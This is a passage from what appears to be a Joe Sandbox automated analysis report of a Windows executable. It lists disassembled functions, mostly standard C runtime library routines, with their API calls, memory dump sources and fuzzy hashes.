                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                      • Opcode ID: ab0a5585f4728f4b083ab0203c76dcd914c290c613830b8fb672953e76dfbeaf
                                                                                                                                                                      • Instruction ID: e12e2266f2c5597963a076cac34a773335f46e64fde83a4c903977557fcff6cd
                                                                                                                                                                      • Opcode Fuzzy Hash: ab0a5585f4728f4b083ab0203c76dcd914c290c613830b8fb672953e76dfbeaf
                                                                                                                                                                      • Instruction Fuzzy Hash: 18017535A0560BBAEB219BE5EC05F5B77B8AF00759F210067F401F11C0EBB8EB49965D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401114 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004016F1
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401706
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(005D3200), ref: 00401711
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040172D
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00401734
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                      • Opcode ID: 6183995e8a9234be8f72c8ec433727ed1f4409292c1d0f17acdd460962d8939a
                                                                                                                                                                      • Instruction ID: 14569deebbe99a70443352391f945edaa80685d3f17305dbca174a7e4b935e44
                                                                                                                                                                      • Opcode Fuzzy Hash: 6183995e8a9234be8f72c8ec433727ed1f4409292c1d0f17acdd460962d8939a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4021BBB49022469BC761DFA5E98D6453BB4BB29311F40405BE908972B0E7745A8DEF06
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403309 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000032C7), ref: 0040330E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                      • Opcode ID: 520091967093e70f54d6df6aff6eeac3e5907f5bcbc478060031739e706eef65
                                                                                                                                                                      • Instruction ID: af7747831dca90d067a641109b8f3fd4e4e1c0d0d7096b425751d24dc54ade0a
                                                                                                                                                                      • Opcode Fuzzy Hash: 520091967093e70f54d6df6aff6eeac3e5907f5bcbc478060031739e706eef65
                                                                                                                                                                      • Instruction Fuzzy Hash: 089002642725004AC7512F745D1D6056AD46A69A0375104F76101D50E4DA6442086916
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004041A0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401549), ref: 004041A8
                                                                                                                                                                      • __mtterm.LIBCMT ref: 004041B4
                                                                                                                                                                        • Part of subcall function 00403E73: DecodePointer.KERNEL32(00000005,00404316,?,00401549), ref: 00403E84
                                                                                                                                                                        • Part of subcall function 00403E73: TlsFree.KERNEL32(00000003,00404316,?,00401549), ref: 00403E9E
                                                                                                                                                                        • Part of subcall function 00403E73: DeleteCriticalSection.KERNEL32(00000000,00000000,775857D0,?,00404316,?,00401549), ref: 004046CF
                                                                                                                                                                        • Part of subcall function 00403E73: _free.LIBCMT ref: 004046D2
                                                                                                                                                                        • Part of subcall function 00403E73: DeleteCriticalSection.KERNEL32(00000003,775857D0,?,00404316,?,00401549), ref: 004046F9
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004041CA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004041D7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004041E4
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004041F1
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,00401549), ref: 00404241
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,00401549), ref: 0040425C
                                                                                                                                                                      • __init_pointers.LIBCMT ref: 00404266
                                                                                                                                                                      • EncodePointer.KERNEL32(?,00401549), ref: 00404277
                                                                                                                                                                      • EncodePointer.KERNEL32(?,00401549), ref: 00404284
                                                                                                                                                                      • EncodePointer.KERNEL32(?,00401549), ref: 00404291
                                                                                                                                                                      • EncodePointer.KERNEL32(?,00401549), ref: 0040429E
                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00003FF7,?,00401549), ref: 004042BF
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 004042D4
                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,00401549), ref: 004042EE
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00404300
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                                      • Opcode ID: cbc81ace7e8aed11d47997de51eeb62a2c9a6c79db5613dd093cfc8f1bf93a05
                                                                                                                                                                      • Instruction ID: 0a0f7951c94fa4b33b50bd7d0535fda9b2e27fb8df27acd751501bc7d14e3bc1
                                                                                                                                                                      • Opcode Fuzzy Hash: cbc81ace7e8aed11d47997de51eeb62a2c9a6c79db5613dd093cfc8f1bf93a05
                                                                                                                                                                      • Instruction Fuzzy Hash: 5931A6729422129BCB31AFB9EC499563FA4EBA4354701013BF521A36F0DBB48448EF95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D6EE Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                      • String ID: 0|]
                                                                                                                                                                      • API String ID: 888903860-1299851057
                                                                                                                                                                      • Opcode ID: 5790133d6ff639bfcd36794fd8b5d889e15627640a797947bdf71ab940860c44
                                                                                                                                                                      • Instruction ID: 731aa1c8d6d5dfd3d485811297dd79a8d5fd6348316387e40cc81dde167a7788
                                                                                                                                                                      • Opcode Fuzzy Hash: 5790133d6ff639bfcd36794fd8b5d889e15627640a797947bdf71ab940860c44
                                                                                                                                                                      • Instruction Fuzzy Hash: CA21EA39504A01ABE7217F9AD80291B7BE4DF85794B20403FF885772E1EE399C05CE5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040CB85 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock.LIBCMT ref: 0040CADC
                                                                                                                                                                        • Part of subcall function 004047FA: __mtinitlocknum.LIBCMT ref: 00404810
                                                                                                                                                                        • Part of subcall function 004047FA: __amsg_exit.LIBCMT ref: 0040481C
                                                                                                                                                                        • Part of subcall function 004047FA: EnterCriticalSection.KERNEL32(?,?,?,00403EFA,0000000D), ref: 00404824
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(00000000), ref: 0040CAEE
                                                                                                                                                                      • _free.LIBCMT ref: 0040CB03
                                                                                                                                                                        • Part of subcall function 00405342: HeapFree.KERNEL32(00000000,00000000,?,00403FCE,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 00405358
                                                                                                                                                                        • Part of subcall function 00405342: GetLastError.KERNEL32(00000000,?,00403FCE,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 0040536A
                                                                                                                                                                      • __lock.LIBCMT ref: 0040CB1C
                                                                                                                                                                      • ___removelocaleref.LIBCMT ref: 0040CB2B
                                                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 0040CB44
                                                                                                                                                                      • _free.LIBCMT ref: 0040CB61
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                      • String ID: 0|]
                                                                                                                                                                      • API String ID: 556454624-1299851057
                                                                                                                                                                      • Opcode ID: 8eea58b5b504349ba5ec76f70c56eb3e3b59d7e91ff100543da38d48bd871ae5
                                                                                                                                                                      • Instruction ID: 7f7fa4578048f67398edcee87a534f6b82c7b5a3ea207e2f20094a40fb616e9d
                                                                                                                                                                      • Opcode Fuzzy Hash: 8eea58b5b504349ba5ec76f70c56eb3e3b59d7e91ff100543da38d48bd871ae5
                                                                                                                                                                      • Instruction Fuzzy Hash: DF11C131501704D6DB30AFA9A886B1B77E4AF00714F20423FF485BB2D1DA7CA880DA5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403EB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,005D5840,00000008,00403FB8,00000000,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 00403EC1
                                                                                                                                                                      • __lock.LIBCMT ref: 00403EF5
                                                                                                                                                                        • Part of subcall function 004047FA: __mtinitlocknum.LIBCMT ref: 00404810
                                                                                                                                                                        • Part of subcall function 004047FA: __amsg_exit.LIBCMT ref: 0040481C
                                                                                                                                                                        • Part of subcall function 004047FA: EnterCriticalSection.KERNEL32(?,?,?,00403EFA,0000000D), ref: 00404824
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(005D75A0), ref: 00403F02
                                                                                                                                                                      • __lock.LIBCMT ref: 00403F16
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00403F34
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                      • String ID: 0|]$KERNEL32.DLL
                                                                                                                                                                      • API String ID: 637971194-1600287274
                                                                                                                                                                      • Opcode ID: 69f06a74c447a22ada258c021a0f03cdb7258d261a95eb0f98c42ecbf1972d1b
                                                                                                                                                                      • Instruction ID: 8f16b0255503f691f8a3e543b44cc219df7106ce82ae31dbeb5ac327894f1df1
                                                                                                                                                                      • Opcode Fuzzy Hash: 69f06a74c447a22ada258c021a0f03cdb7258d261a95eb0f98c42ecbf1972d1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E015271405B00DBD720AF6AD406749BBF0BF50315F10891FE599663E0CBB4AA44DB19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040589D Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 004058A9
                                                                                                                                                                        • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
                                                                                                                                                                        • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 004058C9
                                                                                                                                                                      • __lock.LIBCMT ref: 004058D9
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004058F6
                                                                                                                                                                      • _free.LIBCMT ref: 00405909
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02611660), ref: 00405921
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                      • Opcode ID: 33181e8ec0f922a003a214b633089255946aa2815f78c07681ab6451bcf2ff92
                                                                                                                                                                      • Instruction ID: 7f72c543f57e19f5ebbb72d3d602035d3835e0651ff43b30e1a66ef83f7e2d14
                                                                                                                                                                      • Opcode Fuzzy Hash: 33181e8ec0f922a003a214b633089255946aa2815f78c07681ab6451bcf2ff92
                                                                                                                                                                      • Instruction Fuzzy Hash: 27018B72902A25EBCB20AB699805B5B77A0FF04724F14412BF801B73D0DB386A51DF9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040CB90 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 0040CB9C
                                                                                                                                                                        • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
                                                                                                                                                                        • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0040CBA7
                                                                                                                                                                        • Part of subcall function 00401955: Sleep.KERNEL32(00000000), ref: 0040197D
                                                                                                                                                                      • __lock.LIBCMT ref: 0040CBDD
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 0040CBE9
                                                                                                                                                                      • __lock.LIBCMT ref: 0040CBFD
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 0040CC0D
                                                                                                                                                                        • Part of subcall function 0040177E: __getptd_noexit.LIBCMT ref: 0040177E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3803058747-0
                                                                                                                                                                      • Opcode ID: 4581fc5b44cedc6388dc6f186122ee8f2792b08881d46a136e530d971f11c6e8
                                                                                                                                                                      • Instruction ID: 50812d6c148537c975f453f210ee234fcded8bd6a716d7ccd869d7ac18e2cda8
                                                                                                                                                                      • Opcode Fuzzy Hash: 4581fc5b44cedc6388dc6f186122ee8f2792b08881d46a136e530d971f11c6e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 36019E71501701EAE720BFB9D846B0D7BA0AF04724F20462FF459B72D1CB7859009B69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040C80A Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileType.KERNEL32(?,?,?,005D5B40,0000000C), ref: 0040C83E
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,005D5B40,0000000C), ref: 0040C848
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0040C84F
                                                                                                                                                                      • __alloc_osfhnd.LIBCMT ref: 0040C870
                                                                                                                                                                      • __set_osfhnd.LIBCMT ref: 0040C89A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 43408053-0
                                                                                                                                                                      • Opcode ID: 52c800735ce2767c80bdb55c38c92d91d6df7c7cee2aea7387d499ee4b27126b
                                                                                                                                                                      • Instruction ID: d90f798e2c096a9db0fe2a23a860d11de54a66586ad50496df02bf1c65ad6b1f
                                                                                                                                                                      • Opcode Fuzzy Hash: 52c800735ce2767c80bdb55c38c92d91d6df7c7cee2aea7387d499ee4b27126b
                                                                                                                                                                      • Instruction Fuzzy Hash: 37212532541205DACB21BF75C8817D97B60AF42329F28C76BE464AB2E2C77D8541DF8D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040454D Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 0040455B
                                                                                                                                                                        • Part of subcall function 004044B9: __FF_MSGBANNER.LIBCMT ref: 004044D2
                                                                                                                                                                        • Part of subcall function 004044B9: __NMSG_WRITE.LIBCMT ref: 004044D9
                                                                                                                                                                        • Part of subcall function 004044B9: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00401921,00000000,00000001,00000000,?,00404785,00000018,005D5890,0000000C,00404815), ref: 004044FE
                                                                                                                                                                      • _free.LIBCMT ref: 0040456E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
